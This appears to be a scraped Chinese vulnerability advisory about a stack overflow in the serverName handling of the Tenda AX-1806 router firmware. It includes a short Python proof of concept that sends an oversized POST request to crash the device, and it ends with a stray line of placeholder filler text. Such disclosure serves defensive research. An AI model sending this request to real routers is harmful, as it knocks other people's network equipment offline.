# N/A
## 概述
Tenda AX-1806 v1.0.0.1 存在一个堆栈溢出漏洞,位于 sub_65A28 函数的 serverName 参数处理过程中。
## 影响版本
Tenda AX-1806 v1.0.0.1
## 细节
攻击者可通过构造恶意请求,利用 sub_65A28 函数中对 serverName 参数的不安全处理,触发堆栈溢出。
## 影响
该漏洞可被用于发起拒绝服务(DoS)攻击,导致设备服务中断或崩溃。
是否为 Web 类漏洞: 未知
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
标题: VulnbyCola/Tenda/AX-1806/7/1.md at main · 0-fool/VulnbyCola · GitHub -- 🔗来源链接
标签:
神龙速读:
- **漏洞详情**
- **厂商:** Tenda
- **产品:** AX-1806
- **版本:** v1.0.0.1 ([下载链接](https://www.tenda.com.cn/download/detail-3421.html))
- **漏洞类型:** Stack Overflow
- **作者:** Chuanhao Wan
- **邮箱:** chuanhaowan@hust.edu.cn
- **机构:** 华中科技大学 (HUST)
- **漏洞原因**
- 在 `sub_65A28` 函数中,`serverName` 变量从用户可控的输入中获取,经由 `strncpy` 复制到本地缓冲区 `v6`,但未进行边界检查。
- 由于 `serverName` 是可由用户提供的并无限长限制,攻击者可通过提供过长值引起栈溢出,破坏相邻的栈内存。
- **漏洞Poc**
- Poc示例:
```python
import requests
url = "http://192.168.20.12/goform/AdvSetMacMtuan"
serverName = "A"*7000
data = { "serverName": serverName }
r = requests.post(url, data= data)
print(r.status_code, r.text)
```
Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.